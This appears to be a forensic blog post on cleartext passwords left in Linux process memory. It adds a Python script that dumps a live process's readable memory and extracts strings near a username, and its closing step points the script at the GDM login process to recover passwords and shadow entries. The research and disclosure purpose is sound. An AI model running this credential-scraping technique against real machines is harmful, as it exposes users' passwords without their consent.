During the last few months I’ve investigated Linux memory, and consistently found cleartext passwords, including my login, SSH, email, IM, Truecrypt, and root passwords. The following paper includes details regarding each password’s location in memory and surrounding context.
Given the recent developments with cold boot memory dumping, the risk associated with cleartext passwords and other sensitive data in memory has significantly increased. Last week at HOPE, Jacob Appelbaum released some of the cold boot tools that the Princeton, EFF and Wind River team used to dump and analyze memory.
My hope is that detailed information about cleartext passwords will be useful to forensic examiners and the Linux development community. For folks who would like to examine the data for themselves, below are some snippets of process memory that I collected from my Ubuntu test system.
Each zipfile contains a pcat capture of process memory, as well as files containing the ASCII and Unicode strings. In the GDM process memory, you’ll find the login username, password, and shadow file information. In the Truecrypt process memory, you’ll find the volume location, password, and the command used to mount it. There’s other interesting stuff in there as well.
GDM process memory (.zip, 6.0M)
login username: myname1
Truecrypt process memory (.zip, 7.5M)
volume location: /home/myname1/Desktop/tcvol
shell command: truecrypt Desktop/tcvol
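The captures above were produced with pcat and then run through a strings extractor. The script below is an added example (my code, not the post's tooling) that does the same job without pcat: it copies every readable mapping of a live process out of /proc/<pid>/mem, pulls ASCII and UTF-16LE ("Unicode") runs out of the image, and lists the strings sitting near a keyword such as the GDM username, which is how the surrounding context in the post was located. The names `Hit`, `extract_strings`, `context_around` and `dump_process` are mine, and `SAMPLE_IMAGE` is a constructed stand-in for a GDM-style memory region (the username `myname1` is the post's; the password, hash and salt are placeholders, not data from the post). Reading another process's memory needs ptrace rights on the target (root, or the same uid with `kernel.yama.ptrace_scope` set to 0).

```python
"""Dump a Linux process's readable memory and pull ASCII / UTF-16LE strings out of it.

Added example, not code from the original post.  It approximates the post's
pcat capture plus the ASCII/Unicode strings files: read /proc/<pid>/maps,
copy each readable mapping from /proc/<pid>/mem, then scan for printable runs.
"""
import re
import sys
from dataclasses import dataclass
from typing import List, Tuple

MIN_LEN = 6  # same default floor as `strings -n`


@dataclass
class Hit:
    offset: int      # byte offset inside the scanned image
    encoding: str    # "ascii" or "utf-16le"
    text: str


def extract_strings(image: bytes, min_len: int = MIN_LEN) -> List[Hit]:
    """Return every printable run of at least `min_len` characters, sorted by offset.

    ASCII runs are bytes 0x20..0x7e; "Unicode" runs are UTF-16LE sequences of the
    same characters (what `strings -el` reports).  Like strings, this is naive: a
    printable byte immediately before a wide string will be glued onto it.
    """
    ascii_re = re.compile(rb"[\x20-\x7e]{%d,}" % min_len)
    utf16_re = re.compile(rb"(?:[\x20-\x7e]\x00){%d,}" % min_len)
    hits = [Hit(m.start(), "ascii", m.group().decode("ascii"))
            for m in ascii_re.finditer(image)]
    hits += [Hit(m.start(), "utf-16le", m.group().decode("utf-16-le"))
             for m in utf16_re.finditer(image)]
    return sorted(hits, key=lambda h: h.offset)


def context_around(hits: List[Hit], keyword: str, window: int = 64) -> List[Hit]:
    """Strings within `window` bytes of any string containing `keyword` (case-insensitive).

    This is the "surrounding context" step: find the username, then look at what
    the process left next to it.
    """
    anchors = [h for h in hits if keyword.lower() in h.text.lower()]
    found = {}
    for a in anchors:
        for h in hits:
            if h is not a and abs(h.offset - a.offset) <= window:
                found[h.offset] = h
    return [found[k] for k in sorted(found)]


def dump_process(pid: int) -> List[Tuple[int, bytes]]:
    """Copy every readable mapping of `pid` via /proc/<pid>/mem (needs ptrace permission)."""
    regions = []
    with open(f"/proc/{pid}/maps") as maps, open(f"/proc/{pid}/mem", "rb", buffering=0) as mem:
        for line in maps:
            addr, perms = line.split()[:2]
            if "r" not in perms:
                continue
            start, end = (int(x, 16) for x in addr.split("-"))
            try:
                mem.seek(start)
                regions.append((start, mem.read(end - start)))
            except (OSError, OverflowError):
                continue  # [vvar], [vsyscall] and some device mappings refuse reads
    return regions


# Constructed sample image (not from the post's capture): a username variable,
# some ELF-header bytes, a placeholder password, a UTF-16LE secret, a shadow-style line.
SAMPLE_IMAGE = (
    b"\x00" * 8
    + b"GDM_LOGIN_USER=myname1\x00"
    + b"\x7fELF\x02\x01\x01\x00"
    + b"Password: Pa55w0rd-constructed\x00\x00\x00"
    + "wide-Secret-constructed".encode("utf-16-le") + b"\x00\x00"
    + b"root:$6$constructedsalt$constructedhash:17000:0:99999:7:::\x00"
)


if __name__ == "__main__":
    if len(sys.argv) == 2:  # usage: sudo python3 memstrings.py <pid>
        for base, data in dump_process(int(sys.argv[1])):
            for h in extract_strings(data):
                print(f"{base + h.offset:#x} {h.encoding:8} {h.text}")
    else:  # no pid given: scan the constructed sample instead
        for h in extract_strings(SAMPLE_IMAGE):
            print(f"{h.offset:#06x} {h.encoding:8} {h.text}")
        for h in context_around(extract_strings(SAMPLE_IMAGE), "GDM_LOGIN", window=40):
            print("near username:", h.text)
```

On a real target, run it against the GDM pid and grep the output for the username; the password and the shadow entry show up in the same neighbourhood, as in the post's capture. Reading /proc/<pid>/mem is a live-system technique and will not work on a cold-boot image; for those, feed the raw dump straight into `extract_strings`.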